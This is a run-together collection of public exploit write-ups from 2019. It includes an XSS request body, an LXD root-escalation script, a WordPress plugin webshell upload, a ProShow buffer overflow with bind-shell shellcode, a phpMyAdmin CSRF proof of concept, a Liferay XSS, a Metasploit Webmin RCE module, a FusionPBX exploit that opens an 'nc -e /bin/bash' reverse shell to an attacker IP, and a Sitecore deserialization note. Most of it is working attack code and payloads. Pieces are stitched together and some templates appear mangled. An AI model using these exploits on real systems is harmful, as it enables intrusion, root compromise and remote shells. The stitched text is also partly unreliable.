csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=23&systemname=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E&page_title=UNK9VVN&alternate_title=assdasdasd&show_headline=1&type=page&language=en&menu=top&position=0&parent=NULL&activated=1&target=_self&hidden=0&category=1&menu_image=&redirection=&link_to_language=&meta_description=&meta_keywords=&article_author_name=&article_author_email=&comment_homepage=&article_date=2019-06-09T00%3A40%3A01&excerpt=&og_title=&og_description=&og_type=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=NULL&list_order_by=title&list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url=&text_position=before&article_image=&autor=1&group_id=1&comments_enabled=null&cache_control=auto&theme=&access%5B%5D=all&custom_data=%7B%0A%0A%7D&page_content= # Discovered by: t.me/Unk9vvN

#!/usr/bin/env bash # ---------------------------------- # Authors: Marcelo Vazquez (S4vitar) # Victor Lasa (vowkin) # ---------------------------------- # Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine] # Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine] # Step 3: Run this script and you will get root [Victim Machine] # Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine function helpPanel(){ echo -e "\nUsage:" echo -e "\t[-f] Filename (.tar.gz alpine file)" echo -e "\t[-h] Show this help panel\n" exit 1 } function createContainer(){ lxc image import $filename --alias alpine && lxd init --auto echo -e "[*] Listing images...\n" && lxc image list lxc init alpine privesc -c security.privileged=true lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true lxc start privesc lxc exec privesc sh cleanup } function cleanup(){ echo -en "\n[*] Removing container..." lxc stop privesc && lxc delete privesc && lxc image delete alpine echo " [√]" } set -o nounset set -o errexit declare -i parameter_enable=0; while getopts ":f:h:" arg; do case $arg in f) filename=$OPTARG && let parameter_enable+=1;; h) helpPanel;; esac done if [ $parameter_enable -ne 1 ]; then helpPanel else createContainer fi

# Exploit Title: Authenticated code execution in `insert-or-embed-articulate-content-into-wordpress` Wordpress plugin # Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive # Date: june 2019 # Exploit Author: xulchibalraa # Vendor Homepage: https://wordpress.org/plugins/insert-or-embed-articulate-content-into-wordpress/ # Software Link: https://downloads.wordpress.org/plugin/insert-or-embed-articulate-content-into-wordpress.4.2995.zip # Version: 4.2995 <= 4.2997 # Tested on: Wordpress 5.1.1, PHP 5.6 # CVE : - ## 1. Create a .zip archive with 2 files: index.html, index.php echo "<html>hello</html>" > index.html echo "<?php echo system($_GET['cmd']); ?>" > index.php zip poc.zip index.html index.php ## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it) ## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;) ## 4. Access the webshell from the URL displayed after upload similar to http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami

#!/usr/bin/python # _*_ coding:utf-8 _*_ # Exploit Title: ProShow v9.0.3797 Local Exploit # Exploit Author: @Yonatan_Correa # website with details: https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html # Vendor Homepage: http://www.photodex.com/ProShow # Software Link: http://files.photodex.com/release/pspro_90_3797.exe # Version: v9.0.3797 # Tested on: Wind 7 from struct import pack informacion = """ ProShow v9.0.3797 http://www.photodex.com/ProShow execute exploit create a file called "load" copy load "C:\Program Files\Photodex\ProShow Producer\" "C:\Program Files\Photodex\ProShow Producer\proshow.exe" And connect nc -nv IP_Host 4444 Testing: Windows 7 @Yonatan_Correa https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html """ # msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -e x86/alpha_mixed LPORT=4444 EXITFUNC=seh -f c # Payload size: 717 bytes shell = "yonayona" + ("\x89\xe5\xda\xc2\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a" "\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41" "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b" "\x4c\x59\x78\x4f\x72\x57\x70\x65\x50\x45\x50\x53\x50\x6d\x59" "\x39\x75\x75\x61\x4f\x30\x45\x34\x6c\x4b\x30\x50\x66\x50\x6e" "\x6b\x30\x52\x74\x4c\x6e\x6b\x36\x32\x77\x64\x6c\x4b\x72\x52" "\x36\x48\x66\x6f\x4c\x77\x42\x6a\x46\x46\x75\x61\x79\x6f\x4e" "\x4c\x55\x6c\x50\x61\x51\x6c\x55\x52\x64\x6c\x77\x50\x79\x51" "\x38\x4f\x36\x6d\x53\x31\x79\x57\x4a\x42\x49\x62\x42\x72\x42" "\x77\x4e\x6b\x32\x72\x64\x50\x4e\x6b\x71\x5a\x55\x6c\x4c\x4b" "\x32\x6c\x37\x61\x31\x68\x79\x73\x43\x78\x67\x71\x58\x51\x52" "\x71\x4c\x4b\x51\x49\x65\x70\x43\x31\x68\x53\x4c\x4b\x70\x49" "\x42\x38\x4a\x43\x47\x4a\x71\x59\x6c\x4b\x76\x54\x6e\x6b\x53" "\x31\x4e\x36\x64\x71\x79\x6f\x4c\x6c\x69\x51\x38\x4f\x66\x6d" "\x67\x71\x48\x47\x56\x58\x6d\x30\x64\x35\x38\x76\x65\x53\x53" "\x4d\x59\x68\x35\x6b\x73\x4d\x65\x74\x54\x35\x58\x64\x72\x78" "\x4c\x4b\x52\x78\x46\x44\x76\x61\x58\x53\x35\x36\x4c\x4b\x56" "\x6c\x50\x4b\x4e\x6b\x30\x58\x57\x6c\x57\x71\x49\x43\x4e\x6b" "\x75\x54\x4e\x6b\x56\x61\x48\x50\x4f\x79\x42\x64\x75\x74\x64" "\x64\x61\x4b\x43\x6b\x33\x51\x43\x69\x50\x5a\x73\x61\x69\x6f" "\x6b\x50\x63\x6f\x53\x6f\x32\x7a\x6c\x4b\x47\x62\x5a\x4b\x4c" "\x4d\x71\x4d\x43\x58\x70\x33\x77\x42\x35\x50\x53\x30\x35\x38" "\x63\x47\x43\x43\x34\x72\x61\x4f\x46\x34\x71\x78\x62\x6c\x51" "\x67\x67\x56\x73\x37\x39\x6f\x58\x55\x68\x38\x4a\x30\x67\x71" "\x33\x30\x35\x50\x76\x49\x78\x44\x46\x34\x36\x30\x62\x48\x46" "\x49\x6b\x30\x50\x6b\x65\x50\x79\x6f\x48\x55\x43\x5a\x37\x78" "\x50\x59\x62\x70\x5a\x42\x4b\x4d\x51\x50\x70\x50\x73\x70\x30" "\x50\x61\x78\x4b\x5a\x44\x4f\x39\x4f\x39\x70\x69\x6f\x68\x55" "\x4d\x47\x70\x68\x77\x72\x43\x30\x47\x61\x73\x6c\x4f\x79\x4d" "\x36\x52\x4a\x66\x70\x31\x46\x61\x47\x35\x38\x69\x52\x39\x4b" "\x44\x77\x73\x57\x69\x6f\x6b\x65\x76\x37\x71\x78\x78\x37\x4a" "\x49\x64\x78\x39\x6f\x79\x6f\x79\x45\x62\x77\x62\x48\x54\x34" "\x78\x6c\x57\x4b\x79\x71\x79\x6f\x5a\x75\x63\x67\x4e\x77\x33" "\x58\x30\x75\x32\x4e\x70\x4d\x33\x51\x59\x6f\x6a\x75\x65\x38" "\x53\x53\x50\x6d\x71\x74\x47\x70\x4b\x39\x6a\x43\x61\x47\x76" "\x37\x36\x37\x76\x51\x6b\x46\x72\x4a\x37\x62\x52\x79\x63\x66" "\x7a\x42\x6b\x4d\x61\x76\x6f\x37\x32\x64\x55\x74\x45\x6c\x76" "\x61\x75\x51\x4e\x6d\x43\x74\x77\x54\x34\x50\x49\x56\x47\x70" "\x51\x54\x32\x74\x56\x30\x62\x76\x73\x66\x52\x76\x43\x76\x56" "\x36\x62\x6e\x50\x56\x71\x46\x53\x63\x51\x46\x61\x78\x52\x59" "\x5a\x6c\x67\x4f\x4d\x56\x59\x6f\x6e\x35\x6c\x49\x6d\x30\x70" "\x4e\x71\x46\x61\x56\x79\x6f\x44\x70\x45\x38\x56\x68\x4c\x47" "\x45\x4d\x75\x30\x6b\x4f\x79\x45\x4d\x6b\x4b\x4e\x76\x6e\x54" "\x72\x48\x6a\x35\x38\x59\x36\x5a\x35\x6d\x6d\x6d\x4d\x49\x6f" "\x6e\x35\x55\x6c\x36\x66\x43\x4c\x44\x4a\x4d\x50\x59\x6b\x6b" "\x50\x72\x55\x75\x55\x6f\x4b\x32\x67\x74\x53\x74\x32\x70\x6f" "\x72\x4a\x73\x30\x52\x73\x39\x6f\x59\x45\x41\x41") junk = shell + ("\x41" * 9479) # 10204 nseh = "\xEB\x06\x90\x90" seh = pack('<I',0x10045f50) # pop pop ret nop = "\x90" * 86 nop2 = "\x90" * 10 egg = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" "\xef\xb8\x79\x6f\x6e\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") todo = junk + nseh + seh + nop + egg + nop2 arch = open("load", "wb") arch.write(todo) arch.close() print informacion print "\nCreated File size " + str(len(todo))

# Exploit Title: Cross Site Request Forgery (CSRF) # Date: 11 June 2019 # Exploit Author: Riemann # Vendor Homepage: https://www.phpmyadmin.net/ # Software Link: https://www.phpmyadmin.net/downloads/ # Version: 4.8 # Tested on: UBUNTU 16.04 LTS -Installed Docker image - docker pull phpmyadmin/phpmyadmin:4.8 # CVE : 2019-12616 # Description # An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) to the victim. #VULNERABILITY: The following request which is a form submission is done using the ¨GET¨ request instead of using ¨POST <form method="get" action="index.php" class="disableAjax"> GET http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+%60pma__bookmark%60+(%60id%60%2C+%60dbase%60%2C+%60user%60%2C+%60label%60%2C+%60query%60)+VALUES+(DAYOFWEEK(%27%27)%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27)&show_query=1&db=phpmyadmin&table=pma__bookmark HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Cookie: pmaCookieVer=5; pma_lang=en; pma_collation_connection=utf8mb4_unicode_ci; pmaUser-1=%7B%22iv%22%3A%22M16ZzlA0rqF9BZ1jFsssjQ%3D%3D%22%2C%22mac%22%3A%22804941d12fceca0997e181cbcb8427d68c668240%22%2C%22payload%22%3A%22mD9juTxAYhC7lA7XPWHWOw%3D%3D%22%7D; phpMyAdmin=9bdd66557e399fc1447bf253bc2dc133 Upgrade-Insecure-Requests: 1 Host: localhost:9000 The attacker can easily create a fake hyperlink containing the request that wants to execute on behalf the user,in this way making possible a CSRF attack due to the wrong use of HTTP method #POC <!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <title>POC CVE-2019-12616</title> </head> <body> <a href="http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+`pma__bookmark`+(`id`%2C+`dbase`%2C+`user`%2C+`label`%2C+`query`)+VALUES+(DAYOFWEEK('')%2C+''%2C+''%2C+''%2C+'')&show_query=1&db=phpmyadmin&table=pma__bookmark">View my Pictures!</a> </body> </html>

# Exploit Title: Liferay Portal < 7.1 CE GA4 / SimpleCaptcha API XSS # Date: 04/06/2019 # Exploit Author: Valerio Brussani (@val_brux) # Website: www.valbrux.it # Vendor Homepage: https://www.liferay.com/ # Software Link: https://www.liferay.com/it/downloads-community # Version: < 7.1 CE GA4 # Tested on: Liferay Portal 7.1 CE GA3 # CVE: CVE-2019-6588 # Reference1: https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-71/-/asset_publisher/7v4O7y85hZMo/content/cst-7130-multiple-xss-vulnerabilities-in-7-1-ce-ga3 # Reference2: https://www.valbrux.it/blog/2019/06/04/cve-2019-6588-liferay-portal-7-1-ce-ga4-simplecaptcha-api-xss/ Introduction In Liferay Portal before 7.1 CE GA4, an XSS vulnerability exists in the SimpleCaptcha API when custom code passes unsanitized input into the “url” parameter of the JSP taglib call <liferay-ui:captcha url=”<%= url %>” /> or <liferay-captcha:captcha url=”<%= url %>” />. A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability. Poc In a sample scenario of custom code calling the <liferay-ui:captcha url=”<%= url %>” /> JSP taglib, appending a payload like the following to the body parameters of a customized form: &xxxx%22%3e%3cscript%3ealert(1)</script> The script is reflected in the src attribute of the <img> tag, responsible of fetching the next available captcha: <img alt=”xxx” class=”xxxx” src=”xxxxxx“><script>alert(1)</script>=” />

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Webmin Package Updates Remote Command Execution', 'Description' => %q( This module exploits an arbitrary command execution vulnerability in Webmin 1.910 and lower versions. Any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges. ), 'Author' => [ 'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2019-12840'], ['URL', 'https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html'] ], 'Privileged' => true, 'Payload' => { 'DisableNops' => true, 'Space' => 512, 'Compat' => { 'PayloadType' => 'cmd' } }, 'DefaultOptions' => { 'RPORT' => 10000, 'SSL' => false, 'PAYLOAD' => 'cmd/unix/reverse_perl' }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [['Webmin <= 1.910', {}]], 'DisclosureDate' => 'May 16 2019', 'DefaultTarget' => 0) ) register_options [ OptString.new('USERNAME', [true, 'Webmin Username']), OptString.new('PASSWORD', [true, 'Webmin Password']), OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/']) ] end def peer "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" end def login res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'session_login.cgi'), 'cookie' => 'testing=1', # it must be used for "Error - No cookies" 'vars_post' => { 'page' => '', 'user' => datastore['USERNAME'], 'pass' => datastore['PASSWORD'] } }) if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/ return $1 end return nil unless res '' end def check cookie = login return CheckCode::Detected if cookie == '' return CheckCode::Unknown if cookie.nil? vprint_status('Attempting to execute...') # check version res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "sysinfo.cgi"), 'cookie' => "sid=#{cookie}", 'vars_get' => { "xnavigation" => "1" } }) if res && res.code == 302 && res.body version = res.body.split("- Webmin 1.")[1] return CheckCode::Detected if version.nil? version = version.split(" ")[0] if version <= "910" # check package update priv res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "package-updates/"), 'cookie' => "sid=#{cookie}" }) if res && res.code == 200 && res.body =~ /Software Package Update/ print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<") return CheckCode::Vulnerable end end end print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<") print_status("Please try with another user account!") CheckCode::Safe end def exploit cookie = login if cookie == '' || cookie.nil? fail_with(Failure::Unknown, 'Failed to retrieve session cookie') end print_good("Session cookie: #{cookie}") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'), 'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" }, 'cookie' => "sid=#{cookie}" ) unless res && res.code == 200 fail_with(Failure::Unknown, 'Request failed') end print_status("Attempting to execute the payload...") run_update(cookie) end def run_update(cookie) @b64p = Rex::Text.encode_base64(payload.encoded) perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"' payload = Rex::Text.uri_encode(perl_payload) res = send_request_cgi( { 'method' => 'POST', 'cookie' => "sid=#{cookie}", 'ctype' => 'application/x-www-form-urlencoded', 'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'), 'headers' => { 'Referer' => "#{peer}/package-updates/?xnavigation=1" }, 'data' => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages" }) end end

# Exploit Title: FusionPBX <= 4.4.3 Command Injection RCE via XSS # Date: 06-11-2019 # Exploit Author: Dustin Cobb # Vendor Homepage: https://www.fusionpbx.com # Software Link: https://https://github.com/fusionpbx/fusionpbx # Version: <= 4.4.3 # Tested on: Debian 8.11 # CVE : CVE-2019-11408 (XSS) AND CVE-2019-11409 (Command Injection RCE) #!/usr/bin/python import socket, sys from random import randint from hashlib import md5 # Exploitation steps: # # 1. First, encode an XSS payload that will be injected into the # “Caller ID Number” field, or “User” component of the SIP # “From” URI. # 2. Connect to external SIP profile port and send a SIP INVITE # packet with XSS payload injected into the From Field. # 3. XSS payload will fire operator panel screen (CVE-2019-11408), which # is designed to be monitored constantly by a call center operator. # 4. Once XSS code executes, a call is made to the exec.php script # (CVE-2019-11409) with a reverse shell payload that connects back to # a netcat listener on the attacker system. # edit these variables to set up attack victim_addr="10.10.10.10" victim_host="victim-pbx1.example.com" victim_num="12125551212" attacker_ip="10.10.10.20" attacker_port=4444 def encode(val): ret="" for c in val: ret+="\\x%02x" % ord(c) return ret callid=md5(str(randint(0,99999999))).hexdigest() cmd="nc -e /bin/bash %s %d" % (attacker_ip, attacker_port) payload="q=new XMLHttpRequest();q.open('GET','exec.php?cmd=system %s',true);q.send();" % cmd xss=";tag=%s To: Call-ID: %s CSeq: 1 INVITE Contact: Max-Forwards: 70 User-Agent: Exploit POC Content-Type: application/sdp Allow: INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE, MESSAGE Content-Length: 209 v=0 o=root 1204310316 1204310316 IN IP4 127.0.0.1 s=Media Gateway c=IN IP4 127.0.0.1 t=0 0 m=audio 4446 RTP/AVP 0 101 a=rtpmap:0 PCMU/8000 a=rtpmap:101 telephone-event/8000 a=fmtp:101 0-16 a=ptime:2 a=sendrecv""" % (victim_num, victim_host, xss, callid, victim_num, victim_host, callid) payload=payload.replace("\n","\r\n") s=socket.socket() s.connect((victim_addr,5080)) print payload print s.send(payload) data=s.recv(8192) print data

# Exploit Title: Sitecore v 8.x Deserialization RCE # Date: Reported to vendor October 2018, fix released April 2019. # Exploit Author: Jarad Kopf # Vendor Homepage: https://www.sitecore.com/ # Software Link: Sitecore downloads: https://dev.sitecore.net/Downloads.aspx # Version: Sitecore 8.0 Revision 150802 # Tested on: Windows # CVE : CVE-2019-11080 Exploit: Authentication is needed for this exploit. An attacker needs to login to Sitecore 8.0 revision 150802's Admin section. When choosing to Serializeusers or domains in the admin UI, calls to /sitecore/shell/~/xaml/Sitecore.Shell.Applications.Dialogs.Progress.aspx will include a CSRFTOKEN parameter. By replacing this parameter with a URL-encoded, base64-encoded crafted payload from ysoserial.net, an RCE is successful.